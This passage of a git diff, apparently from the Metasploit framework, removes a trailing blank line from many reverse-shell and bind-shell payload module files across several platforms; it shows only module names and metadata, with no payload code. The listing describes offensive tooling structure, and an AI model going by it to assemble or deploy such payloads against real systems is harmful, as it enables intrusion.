- end diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index 7a10e8420d..79d67e8d44 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -66,5 +66,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index 3af9daeb4a..3420eb2928 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -47,5 +47,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index 390935e487..be90320c6f 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -43,5 +43,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index ac8060a398..c0abc3a0d1 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -42,5 +42,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index e49bf6a8d3..fe37d16052 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -55,5 +55,4 @@ module MetasploitModule OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0]) ]) end - end diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index a8d7c777f6..f8024e8be0 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -43,5 +43,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 3a429d6dde..9876db9968 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -44,5 +44,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 7eecef9d4e..67d60a04fc 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -44,5 +44,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb index 58682c430f..d9fa0183d7 100644 --- a/modules/payloads/stagers/linux/armle/bind_tcp.rb +++ b/modules/payloads/stagers/linux/armle/bind_tcp.rb @@ -112,5 +112,4 @@ module MetasploitModule return true end - end diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb index 4c8bd3fd43..4e31ae2487 100644 --- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb @@ -124,5 +124,4 @@ def handle_intermediate_stage(conn, payload) return true end - end diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index 34462db8be..2c6c861d7b 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -112,5 +112,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb index 36dfc589b4..f621227fbd 100644 --- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -105,5 +105,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index d9ec292995..00966d9458 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -34,5 +34,4 @@ module MetasploitModule def use_ipv6 true end - end diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb index 3177b7cfe0..19a9d568cb 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index 17b7dd5aa3..f6336d30f5 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -48,5 +48,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 870492af0e..da4877aa5d 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Stager' => { 'RequiresMidstager' => true } )) end - end diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb index 7a0d09eb60..925f2ba894 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 55bf57050e..99dc959384 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -43,5 +43,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 9faea34027..3a0187a47b 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -49,5 +49,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index b0ab434242..6aadd01dcd 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -24,5 +24,4 @@ module MetasploitModule 'Handler' => Msf::Handler::ReverseTcp, 'Stager' => { 'Payload' => '' })) end - end diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb index 6b1071094d..663862f08a 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb @@ -37,5 +37,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/multi/reverse_http.rb b/modules/payloads/stagers/multi/reverse_http.rb index 0c6aee6c3d..c7cecb338a 100644 --- a/modules/payloads/stagers/multi/reverse_http.rb +++ b/modules/payloads/stagers/multi/reverse_http.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Stager' => {'Payload' => ''}, 'Convention' => 'http')) end - end diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 88acfbb3b2..544551350e 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -209,5 +209,4 @@ EOS } )) end - end diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index 74ccc4beb4..d4714ebd13 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -150,5 +150,4 @@ module MetasploitModule return true end - end diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index c259091494..1c3313f343 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -126,5 +126,4 @@ module MetasploitModule return true end - end diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 542fbe0516..73a5fd5d19 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -49,5 +49,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index 1895d4ab4d..18eef0730d 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -56,5 +56,4 @@ module MetasploitModule return false end - end diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index cb7976bcb7..28966cf097 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -47,5 +47,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index 41b0f404fe..7279cfa5ef 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -25,5 +25,4 @@ module MetasploitModule 'Stager' => { 'Payload' => "" } )) end - end diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index fc9b21be05..11a5ff6f54 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -33,5 +33,4 @@ module MetasploitModule def use_ipv6 true end - end diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index f8a8d550fe..5a50489ed1 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -37,5 +37,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 8b19739f85..dfd8e6c48f 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -33,5 +33,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index 86661bba1b..c215f6e1a8 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -25,5 +25,4 @@ module MetasploitModule 'Stager' => {'Payload' => ""} )) end - end diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index 2943a9581a..5aa8f56226 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -33,5 +33,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 7dade506ab..c0b94744fc 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -29,5 +29,4 @@ module MetasploitModule 'Stager' => {'Payload' => ""} )) end - end diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb index a51da767c1..391d639561 100644 --- a/modules/payloads/stagers/python/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb index 103fdc7905..d96da8581c 100644 --- a/modules/payloads/stagers/python/reverse_http.rb +++ b/modules/payloads/stagers/python/reverse_http.rb @@ -27,5 +27,4 @@ module MetasploitModule 'Stager' => {'Payload' => ""} )) end - end diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb index 059619f1e4..eca61d4640 100644 --- a/modules/payloads/stagers/python/reverse_https.rb +++ b/modules/payloads/stagers/python/reverse_https.rb @@ -34,5 +34,4 @@ module MetasploitModule def generate super({scheme: 'https'}) end - end diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index bcc1e1d6e3..ff8195b699 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -27,5 +27,4 @@ module MetasploitModule 'Stager' => {'Payload' => ""} )) end - end diff --git a/modules/payloads/stagers/python/reverse_tcp_ssl.rb b/modules/payloads/stagers/python/reverse_tcp_ssl.rb index 855c29df65..926755620c 100644 --- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb +++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb @@ -25,5 +25,4 @@ module MetasploitModule 'Stager' => {'Payload' => ""} )) end - end diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb index bcec6e0c4f..fae33d7346 100644 --- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb @@ -37,5 +37,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/bind_hidden_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_tcp.rb index a2e3b6e027..3c43a9375e 100644 --- a/modules/payloads/stagers/windows/bind_hidden_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_tcp.rb @@ -74,5 +74,4 @@ module MetasploitModule OptAddress.new('AHOST', [true, "IP address allowed", nil]) ]) end - end diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 51c02b0d54..a7e8f936bd 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -34,5 +34,4 @@ module MetasploitModule def use_ipv6 true end - end diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb index ac0ee0375d..66b7d45c15 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb @@ -38,6 +38,5 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index dcad21a6ee..a7b52c74c2 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -50,5 +50,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index d4447a1ef0..6339cb1021 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Stager' => { 'RequiresMidstager' => false } )) end - end diff --git a/modules/payloads/stagers/windows/bind_tcp_rc4.rb b/modules/payloads/stagers/windows/bind_tcp_rc4.rb index 9530a4d699..fc596df6ac 100644 --- a/modules/payloads/stagers/windows/bind_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/bind_tcp_rc4.rb @@ -32,5 +32,4 @@ module MetasploitModule 'Stager' => { 'RequiresMidstager' => false } )) end - end diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb index f2eb51a9c6..5b72bcb5fc 100644 --- a/modules/payloads/stagers/windows/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 677e0b51e9..f041d8b3a1 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -41,5 +41,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 2ce6258a65..045c991bf6 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -25,5 +25,4 @@ module MetasploitModule 'Handler' => Msf::Handler::ReverseHttps, 'Convention' => 'sockedi https')) end - end diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index c4648bc6bb..7ff3f3559c 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -157,6 +157,5 @@ module MetasploitModule def wfs_delay 20 end - end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index e47f8730b9..c3db51bade 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -65,5 +65,4 @@ module MetasploitModule OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) ]) end - end diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index cc61ce8ea9..748ad87616 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -51,5 +51,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index b1145be1c2..78325417a6 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -45,5 +45,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index f6be3bce83..6b92ca19ed 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -32,5 +32,4 @@ module MetasploitModule )) end - end diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb index ebbb49320a..d1e13d61bd 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb @@ -32,5 +32,4 @@ module MetasploitModule 'Stager' => { 'RequiresMidstager' => false } )) end - end diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb index 06a9d639eb..8496bf1946 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb @@ -32,5 +32,4 @@ module MetasploitModule { 'RequiresMidstager' => false } )) end - end diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb index 4340c7731c..cee5931c17 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index a4a2143d3a..69e20612e9 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/reverse_winhttp.rb @@ -29,5 +29,4 @@ module MetasploitModule 'Handler' => Msf::Handler::ReverseHttp, 'Convention' => 'sockedi http')) end - end diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb index e84da0bfca..67a177d87d 100644 --- a/modules/payloads/stagers/windows/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/reverse_winhttps.rb @@ -29,5 +29,4 @@ module MetasploitModule 'Handler' => Msf::Handler::ReverseHttps, 'Convention' => 'sockedi https')) end - end diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb index 4cf5438c1a..c2903e2d9f 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb @@ -34,6 +34,5 @@ module MetasploitModule def use_ipv6 true end - end diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb index 57609a7a52..9ec252a91a 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb @@ -38,7 +38,6 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index 2f921badd2..01d943f685 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Stager' => { 'RequiresMidstager' => false } )) end - end diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb index 113f7a33ee..4cf859ee74 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 831cf95085..317bb8e4fe 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Convention' => 'sockrdi http', 'Stager' => { 'Payload' => '' })) end - end diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index 9b99a770b9..758d41c385 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Convention' => 'sockrdi https', 'Stager' => { 'Payload' => '' })) end - end diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index ef5dbfc7f7..96561b2fc9 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -26,5 +26,4 @@ module MetasploitModule 'Stager' => { 'RequiresMidstager' => false } )) end - end diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb index 0eb351ddc4..3bfb75d3b6 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb @@ -38,5 +38,4 @@ module MetasploitModule def include_send_uuid true end - end diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index b770feb7f4..8ff03e9ee8 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -30,5 +30,4 @@ module MetasploitModule 'Convention' => 'sockrdi http', 'Stager' => { 'Payload' => '' })) end - end diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index fc75dcafed..c1eb9e4783 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -30,5 +30,4 @@ module MetasploitModule 'Convention' => 'sockrdi https', 'Stager' => { 'Payload' => '' })) end - end diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 31b2377b4e..79385d183c 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -28,5 +28,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index c106b096a3..c00e7df5cc 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -29,5 +29,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/linux/armle/shell.rb b/modules/payloads/stages/linux/armle/shell.rb index f66acb9ea4..8a7741fd4e 100644 --- a/modules/payloads/stages/linux/armle/shell.rb +++ b/modules/payloads/stages/linux/armle/shell.rb @@ -45,5 +45,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb index 2ce810df6d..f7c03ddd38 100644 --- a/modules/payloads/stages/linux/mipsbe/shell.rb +++ b/modules/payloads/stages/linux/mipsbe/shell.rb @@ -31,5 +31,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb index 3bd4d83258..a4e3a8b1a8 100644 --- a/modules/payloads/stages/linux/mipsle/shell.rb +++ b/modules/payloads/stages/linux/mipsle/shell.rb @@ -31,5 +31,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index 086fc87a6d..0e8c785b62 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -43,5 +43,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index acdc98246a..ecc3af729c 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -28,5 +28,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/multi/meterpreter.rb b/modules/payloads/stages/multi/meterpreter.rb index 22efa3552b..68701410a8 100644 --- a/modules/payloads/stages/multi/meterpreter.rb +++ b/modules/payloads/stages/multi/meterpreter.rb @@ -73,5 +73,4 @@ module MetasploitModule second_stage.stage_payload(opts) end - end diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index 69325cdbf8..31968cd874 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -165,5 +165,4 @@ module MetasploitModule temp = Rex::Text.rand_text_alphanumeric(9) data.gsub("msf_stage_xxxxxxxxx.bin", "msf_stage_#{temp}.bin") end - end diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index 699bed3514..e5a57f37f0 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -71,5 +71,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 00ac73cd84..983c830b73 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -35,5 +35,4 @@ module MetasploitModule } )) end - end diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index 50c4a70ac7..f8a28de9e6 100644 --- 